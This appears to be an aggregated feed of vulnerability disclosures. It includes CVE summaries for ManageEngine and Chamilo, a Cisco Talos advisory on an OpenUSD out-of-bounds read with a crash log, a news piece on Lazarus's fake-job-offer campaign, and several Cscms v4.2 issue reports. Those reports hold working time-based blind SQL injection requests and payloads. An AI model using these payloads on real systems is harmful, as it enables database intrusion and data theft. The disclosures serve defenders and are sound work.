Zoho ManageEngine ADSelfService Plus before 6121, ADAuditPlus 7060, Exchange Reporter Plus 5701, and ADManagerPlus 7131 allow NTLM Hash disclosure during certain storage-path configuration steps.

CVE-2022-29457: ADSelfService Plus Release Notes

An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles file offsets in binary USD files. A specially crafted malformed file can trigger an arbitrary out-of-bounds memory access that could lead to the disclosure of sensitive information. This vulnerability could be used to bypass mitigations and aid additional exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided file.

**Summary**

An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles file offsets in binary USD files. A specially crafted malformed file can trigger an arbitrary out-of-bounds memory access that could lead to the disclosure of sensitive information. This vulnerability could be used to bypass mitigations and aid additional exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided file.

**Tested Versions**

Pixar OpenUSD 20.05  
Apple macOS Catalina 10.15.3

**Product URLs**

https://openusd.org

**CVSSv3 Score**

4.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

**CWE**

CWE-119 - Improper Restriction of Operations within the Bounds of a Memory Buffer

**Details**

OpenUSD stands for “Open Universal Scene Descriptor” and is a software suite by Pixar that facilitates, among other things, interchange of arbitrary 3-D scenes that may be composed of many elemental assets.

Most notably, USD and its backing file format `usd` are used on Apple iOS and macOS as part of ModelIO framework in support of SceneKit and ARKit for sharing and displaying 3D scenes in, for example, augmented reality applications. On macOS, these files are automatically rendered to generate thumbnails, while on iOS they can be shared via iMessage and opened with user interaction.

USD binary file format consists of a header pointing to a table of contents that in turn points to individual sections that comprise the whole file. Pointer to a table of contents, as well as back to individual sections from the table of contents, is represented as a 64 bit integer specifying a file offset where the table of contents, or specific section, can be found.

For example, table of contents is read using the following code:

    template <class Reader>
    CrateFile::_TableOfContents
    CrateFile::_ReadTOC(Reader reader, _BootStrap const &b) const
    {
        reader.Seek(b.tocOffset);                                        [1]
        return reader.template Read<_TableOfContents>();                 [2]
    }
    

At \[1\] , table of contents offset read from the file header is used to seek into the file and then the parser proceeds to parse the table of contents at \[2\]. When dealing with regular files, `seek` operations usually just shift the current file pointer to the specified offset, however in most practical uses of OpenUSD (including macOS and iOS utilities and applications) USD file will first be memory mapped. When seek is executed, no check is performed to ensure the offset still falls inside the currently memory mapped file. Since the `b.tocOffset` is a 64 bit integer that is read directly from the mapped file, this can be used to access and read any address in process’ address space.

Similarly to above example, same issue can be triggered when trying to parse individual sections of the file. Following code that parses `FIELDS` section illustrates this:

    template <class Reader>
    void
    CrateFile::_ReadFieldSets(Reader reader)
    {
        TfAutoMallocTag tag("_ReadFieldSets");
        if (auto fieldSetsSection = _toc.GetSection(_FieldSetsSectionName)) {               [3]
            reader.Seek(fieldSetsSection->start);                                           [4]
    
            if (Version(_boot) < Version(0,4,0)) {                                          [5]
                _fieldSets = reader.template Read<decltype(_fieldSets)>();
            } else {
                // Compressed fieldSets in 0.4.0.
                auto numFieldSets = reader.template Read<uint64_t>();
                _fieldSets.resize(numFieldSets);
    

When parsing the `FIELDS` section, an offset from table of contents is retrieved at \[3\] and used in a call to `Seek` at 4. Then at \[5\] the parsing continues. Again, no check is performed to ensure that the offset falls inside the file, enabling arbitrary memory read. While only `FIELDS` section example is given here, other section offsets are vulnerable, too.

USD files are usually distributed as `usdz` archives which can contains multiple distinct `usd` files each referencing each other, with careful file layout , this sort of vulnerability could be abused to probe the memory layout and influence which files are successfully loaded. This could be abused to achieve information leak and defeat exploitation mitigations such as ASLR.

**Crash Information**

This vulnerability has been tested on latest version of macOS Catalina 10.15.3.

    Current executable set to 'qlmanage' (x86_64).
    (lldbinit) settings set -- target.run-args  "-t" "poc_toc_offset.usdc" "-o" "./"
    (lldbinit) r
    Process 59980 launched: '/usr/bin/qlmanage' (x86_64)
    Testing Quick Look thumbnails with files:
        poc_toc_offset.usdc
    2020-06-23 18:59:28.405728-0500 qlmanage[59980:11301935] [General] Disabling connection to window server
    2020-06-23 18:59:28.406581-0500 qlmanage[59980:11301935] [General] Number of mach ports: 42
    2020-06-23 18:59:28.408263-0500 qlmanage[59980:11301959] [General] Cache is disabled (real server: NO - cache enabled: NO)
    2020-06-23 18:59:28.832447-0500 qlmanage[59980:11301959] MessageTracer: Falling back to default whitelist
    -----------------------------------------------------------------------------------------------------------------------[regs]
      RAX: 0xF041414241603141  RBX: 0x00007000060A1350  RBP: 0x00007000060A1250  RSP: 0x00007000060A1210  o d I t s Z a P c
      RDI: 0x00007000060A1290  RSI: 0x00007000060A12B8  RDX: 0x0000000000000000  RCX: 0x0000000000000000  RIP: 0x00007FFF379A6F00
      R8:  0x0000000000000000  R9:  0x0000000000000000  R10: 0x0000000100000000  R11: 0x00006FFF05EB22B8  R12: 0x0000000105822A00
      R13: 0x00007000060A12B8  R14: 0x00007000060A1290  R15: 0x00007FFF8DFD9890
      CS:  002B  FS: 0000  GS: 0000
    -----------------------------------------------------------------------------------------------------------------------[code]
    @ /System/Library/Frameworks/ModelIO.framework/Versions/A/ModelIO:
    ->  0x7fff379a6f00 (0x8d5f00): 4c 8b 38        mov    r15, qword ptr [rax]
        0x7fff379a6f03 (0x8d5f03): 48 83 c0 08     add    rax, 0x8
        0x7fff379a6f07 (0x8d5f07): 49 89 45 08     mov    qword ptr [r13 + 0x8], rax
        0x7fff379a6f0b (0x8d5f0b): 4c 89 f7        mov    rdi, r14
        0x7fff379a6f0e (0x8d5f0e): 4c 89 fe        mov    rsi, r15
        0x7fff379a6f11 (0x8d5f11): e8 72 01 00 00  call   0x7fff379a7088 ; ___lldb_unnamed_symbol87486$$ModelIO
        0x7fff379a6f16 (0x8d5f16): 4d 8b 26        mov    r12, qword ptr [r14]
        0x7fff379a6f19 (0x8d5f19): 49 c1 e7 05     shl    r15, 0x5
    -----------------------------------------------------------------------------------------------------------------------------
    
    Process 59980 stopped
    * thread #7, queue = 'quicklookd.serialgenerator', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
        frame #0: 0x00007fff379a6f00 ModelIO`___lldb_unnamed_symbol87485$$ModelIO + 122
    Target 0: (qlmanage) stopped.
    (lldbinit) bt
    * thread #7, queue = 'quicklookd.serialgenerator', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
      * frame #0: 0x00007fff379a6f00 ModelIO`___lldb_unnamed_symbol87485$$ModelIO + 122
        frame #1: 0x00007fff379944ed ModelIO`___lldb_unnamed_symbol87000$$ModelIO + 273
        frame #2: 0x00007fff379941c3 ModelIO`___lldb_unnamed_symbol86998$$ModelIO + 555
        frame #3: 0x00007fff37993e06 ModelIO`___lldb_unnamed_symbol86997$$ModelIO + 392
        frame #4: 0x00007fff37992ec9 ModelIO`___lldb_unnamed_symbol86984$$ModelIO + 447
        frame #5: 0x00007fff37a8bbf6 ModelIO`___lldb_unnamed_symbol91742$$ModelIO + 242
        frame #6: 0x00007fff37a8bac8 ModelIO`___lldb_unnamed_symbol91741$$ModelIO + 54
        frame #7: 0x00007fff37a39d2f ModelIO`___lldb_unnamed_symbol90729$$ModelIO + 287
    

**Timeline**

2020-07-01 - Vendor Disclosure (notified Pixar and Apple individually)  
2020-07-01 - Vendor (Pixar) acknowledged report  
2020-07-02 - Vendor (Apple) acknowledged report  
2020-07-14 - Talos tested latest beta of macOS Catalina 10.15.6  
2020-08-04 - Talos follow up with Pixar; no response  
2020-09-16 - 2nd follow up with Pixar  
2020-11-12 - Public Release

Discovered by Aleksandar Nikolic of Cisco Talos.

CVE-2020-13495: TALOS-2020-1104 || Cisco Talos Intelligence Group

A zero-code remote code injection vulnerability via configuration.php in Chamilo LMS v1.11.13 allows attackers to upload arbitrary code in the form of a new plugin.

CVE-2022-27427: Security issues - Chamilo LMS

Chemical companies are the latest to be targeted by the well-known North Korean group, which has targeted financial firms, security researchers, and technology companies in the past.

The North Korean-linked Lazarus group sent fake job offers to targets in the chemical sector and information technology firms, which — when opened — install Trojan horse programs to collect information and send it back to the attackers, technology provider Broadcom's security arm Symantec stated in an advisory on April 14.

The attack is part of a long-running campaign — dubbed Operation Dream Job — that sends targets in specific industries malicious Web files disguised as job offers, which when opened attempts to compromise the system. While the current set of attacks focuses on South Korean chemical companies and their IT service providers, other targets have included industries and government agencies in Europe, Asia, and the United States. This campaign marks a shift, as Lazarus in the past targeted the defense, government, and engineering sectors.

The attacks have, at various times, targeted defense contractors, engineering firms, government agencies, and even pharmaceutical companies during the height of the pandemic, says Dick O’Brien, principal intelligence analyst for Symantec's threat-hunting team.

"North Korea-linked attackers have a long history of targeting intellectual property, presumably to assist strategically important engineering or technology projects," he says, adding: "Across all attacks, we’ve seen a range of data theft \[and\] data exfiltration tools deployed on infected computers. We’re assuming that they take what they need before moving on."

Other security and technology firms have also documented Lazarus's involvement in Operation Dream Job, which some researchers track as Operation AppleJeus. In early 2021, the Lazarus group targeted security researchers with similar offers of high-level jobs in the industry. And, earlier this year, the attackers targeted more than 250 individuals working for news media, software vendors, and Internet infrastructure providers, using job offers that appeared to come from Disney, Google, and Oracle, according to Google, which tracked the campaign.

A related campaign targeted cryptocurrency and financial technology and services firms, Adam Weidemann, a researcher with Google's Threat Analysis Group, stated in a late March blog post.

"We suspect that these groups work for the same entity with a shared supply chain, hence the use of the same exploit kit, but each operate with a different mission set and deploy different techniques," he wrote. "It is possible that other North Korean government-backed attackers have access to the same exploit kit."

**Long-Running Campaign  
**The April 14 advisory from Symantec noted that the campaign started at least as early as August 2020, albeit with a different set of targets. While the current campaign targets the chemical sector, campaigns discovered in 2020 had focused on government agencies and defense contractors, the company stated in its advisory.

"Operation Dream Job involves Lazarus using fake job offers as a means of luring victims into clicking on malicious links or opening malicious attachments that eventually lead to the installation of malware used for espionage," the company said.

Symantec's threat team outlined the steps in a successful attack in January 2022, which completed less than four days after the target received the file until the final execution of a program that collected and exfiltrated system data. After the targeted user opened the fake job offer, the attack exploited a vulnerability in one of two software packages, the INISAFE Web EX Client for system management or MagicLine, a gym management program, says Symantec's O'Brien.

"They’re not household names for us but our working assumption is they’re widely used in the industry or sector they’re currently targeting," he says. "An alternative hypothesis is they installed the software themselves in order to inject into it, but we haven’t seen any evidence of that."

While companies not running either application may not have to worry about this particular attack, cyber-espionage groups such as Lazarus are very good at tailoring attacks to match their target's environment, he says.

For that reason, no single solution will help prevent cyber-espionage attacks, O'Brien stressed. Instead, companies should take a layered approach to defense, using network detection, endpoint security, and hardening technologies — such as multifactor authentication — to protect against multiple vectors of attack, he says.

"We’d also advise implementing proper audit and control of administrative account usage, \[and\] you could also introduce one-time credentials for administrative work to help prevent theft and misuse of admin credentials," O'Brien says. "We’d also suggest creating profiles of usage for admin tools, \[because\] many of these tools are used by attackers to move laterally undetected through a network."

Lazarus Targets Chemical Sector With 'Dream Jobs,' Then Trojans

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Lists.php_zhuan.

    POST /admin.php/dance/admin/lists/zhuan HTTP/1.1
    Host: cscms.test
    Content-Length: 23
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/lists?v=7131
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n9lv1ptm53932qcefgtfamknehtiv096;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))&cid=5
    

`(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)`

Because the first letter of the background database name is "c", it sleeps for 5 seconds

CVE-2022-27368: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #15 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Topic.php_del.

**There is a SQL blind injection vulnerability in dance\_Topic.php\_del****Details**

After the administrator is logged in, you need to add a song album

![image](https://user-images.githubusercontent.com/96719328/158503082-c3569a79-6b79-45d1-aeaf-5c6cd0d5bb47.png)

    POST /admin.php/dance/admin/topic/save HTTP/1.1
    Host: cscms.test
    Content-Length: 240
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    cid=0&tid=0&yid=0&color=&addtime=ok&name=1&pic=&tags=&fxgs=&yuyan=%E5%9B%BD%E8%AF%AD&diqu=%E5%A4%A7%E9%99%86&year=2022&user=&singer=&skins=topic-show.html&hits=0&yhits=0&zhits=0&rhits=0&shits=0&neir=&file=&title=&keywords=&description=&id=0
    

![image](https://user-images.githubusercontent.com/96719328/158503152-17fb9fba-1b55-4e8d-a2cf-e01efd11f401.png)

When deleting a song album, malicious statements can be constructed to achieve sql injection

![image](https://user-images.githubusercontent.com/96719328/158503192-0dcc9d08-41ae-4705-9de6-b72418ae0129.png)

    POST /admin.php/dance/admin/topic/del HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    id=3)and(sleep(5))--+
    

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158503234-312aa3f5-5fe1-4f0c-99f5-93f4c98cc6c6.png)

contrust payload

    POST /admin.php/dance/admin/topic/del HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    id=3)and(if(substr((select+database()),1,1)='c'sleep(5))--+
    

![image](https://user-images.githubusercontent.com/96719328/158503304-240ee76b-708f-4393-ab13-a2ad4a0d8478.png)

![image](https://user-images.githubusercontent.com/96719328/158503427-84ef4372-0fa8-45f7-b01f-a9d50df7d686.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code

![image](https://user-images.githubusercontent.com/96719328/158503481-46e35f70-11ee-4206-b51a-10a3ad1357f4.png)

Close "id" to achieve blind injection, so the vulnerability exists

CVE-2022-27367: SQL injection vulnerability exists in Cscms music portal system v4.2(dance_Topic.php_del) · Issue #14 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Dance.php_del.

**SQL injection vulnerability exists in Cscms music portal system v4.2**

There is a SQL blind injection vulnerability in dance\_Dance.php\_del

**Details**

Add a song after administrator login  
![image](https://user-images.githubusercontent.com/96719328/158499410-c2be7972-449a-4534-b767-c01d6b108373.png)  
POC

    POST /admin.php/dance/admin/dance/save HTTP/1.1
    Host: cscms.test
    Content-Length: 292
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/dance/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_session=vh1bscpjrcvfiil1mcr4qhgo9ri1dck8; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA
    Connection: close
    
    cid=1&addtime=ok&name=1&color=&pic=&user=&cion=0&purl=&durl=&reco=0&tid=0&fid=0&zc=&zq=&bq=&hy=&singer=&dx=&yz=&sc=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&shits=0&xhits=0&vip=0&level=0&wpurl=&wppass=&skins=play.html&gc=0&text=&file=&lrc=&title=&keywords=&description=&id=0&sid=0
    

![image](https://user-images.githubusercontent.com/96719328/158499490-a9851157-3ebc-4535-992a-06086a6d06f5.png)

When deleting songs in the recycle bin, construct malicious statements and implement sql injection

    POST /admin.php/dance/admin/dance/del?yid=3 HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=kpqu73c98lvqmbbkebu36pbd3pferpdb
    Connection: close
    
    id=7)and(sleep(5))--+
    

![image](https://user-images.githubusercontent.com/96719328/158499667-567c12f1-99ea-4bef-91a0-c0afeb93a4d2.png)

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158499784-ff7a6921-f1a0-4a60-97b3-a9b5cd4ae202.png)

![image](https://user-images.githubusercontent.com/96719328/158499809-e7e71538-9381-4e31-aecb-e5fd6701b7ad.png)

![image](https://user-images.githubusercontent.com/96719328/158499898-d5a1570a-4735-4074-86eb-760c08c6406a.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code

![image](https://user-images.githubusercontent.com/96719328/158499941-b34c8fbd-bd70-409c-a874-04abbb2f0ec9.png)

Close "id" to achieve blind injection, so the vulnerability exists

CVE-2022-27365: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #12 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the component dance_Dance.php_hy.

**There is a SQL blind injection vulnerability in dance\_Dance.php\_hy****Details**

Add a song after administrator login  
![image](https://user-images.githubusercontent.com/96719328/158500746-50c27c84-05ac-4d5b-b206-695c60f63e51.png)

Add songs first and then delete them into the trash

![image](https://user-images.githubusercontent.com/96719328/158500808-df6007b2-2032-4aa0-96f1-b230c5dd15f8.png)

![image](https://user-images.githubusercontent.com/96719328/158500843-0a8fb76e-2255-42a9-8088-373d58c33c2d.png)

When restoring songs in the recycle bin, construct malicious statements and implement sql injection

![image](https://user-images.githubusercontent.com/96719328/158500952-abbb9bc3-b741-47e2-9874-006edcabbc9f.png)

    GET /admin.php/dance/admin/dance/hy?id=10)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=r3kc74ivbu10hbssd9s03lqd0n1mu0g6
    Connection: close
    

The parameter "id" exists time blind, sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158501001-7b2a3508-5f84-4a52-af2c-8121237c8433.png)

construct payload

    GET /admin.php/dance/admin/dance/hy?id=10)and(if(substr((select+database()),1,1)='c',sleep(5),1)--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=r3kc74ivbu10hbssd9s03lqd0n1mu0g6
    Connection: close
    
    

In the figure below, you can see that the first letter of the database is "c", so it sleeps for 5 seconds to verify that the injection exists

![image](https://user-images.githubusercontent.com/96719328/158501196-0862a524-881b-4c3f-814d-1645a92e7fa3.png)

![image](https://user-images.githubusercontent.com/96719328/158501168-cccab3c8-b7b4-45e6-aa48-5e661f1795bd.png)

CVE-2022-27366: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #13 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component news_News.php_hy.

**There is a SQL blind injection vulnerability in news\_News.php\_hy****Details**

After the administrator is logged in, a news needs to be added

![image](https://user-images.githubusercontent.com/96719328/158506380-f537906e-5519-4a24-822f-1a21bfc8fdd5.png)

    POST /admin.php/news/admin/news/save HTTP/1.1
    Host: cscms.test
    Content-Length: 204
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/news/admin/news/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=5apla1fdentnsdis6lbq25n548poo682
    Connection: close
    
    cid=1&tid=0&reco=1&color=&name=1&addtime=ok&info=1&pic=&pic2=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&user=&cion=0&vip=0&level=0&skins=&content=&file=&title=&keywords=&description=&id=0&yid=0
    

![image](https://user-images.githubusercontent.com/96719328/158506454-ac41f81b-55f9-446e-83c8-370f13ddf6cd.png)

delete this article to trash

![image](https://user-images.githubusercontent.com/96719328/158506605-052ebc0a-1e3c-4ace-95a5-dc01f56c80ab.png)

When restoring articles in the recycle bin, construct malicious statements and implement sql injection

![image](https://user-images.githubusercontent.com/96719328/158507281-5c2d57d4-0cda-4883-a3f7-27f06f46579b.png)

    GET /admin.php/news/admin/news/hy?id=5)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/news/admin/news?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=7qpsm1cblear8tgkbflk5mdl7qa7k23f
    Connection: close
    

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158507341-3c9ca5e8-ba6e-4a91-8bc5-5f3d189301c6.png)

![image](https://user-images.githubusercontent.com/96719328/158507430-e4febc1c-b33d-4438-8508-596db0888ace.png)

![image](https://user-images.githubusercontent.com/96719328/158507454-dd256638-00df-4b86-8c3b-ac044267a311.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code  
\\News::hy

![image](https://user-images.githubusercontent.com/96719328/158507501-c6516d6f-0c77-40b5-8877-d8c756f54180.png)

Close "id" to achieve blind injection, so the vulnerability exists

Tag

#apple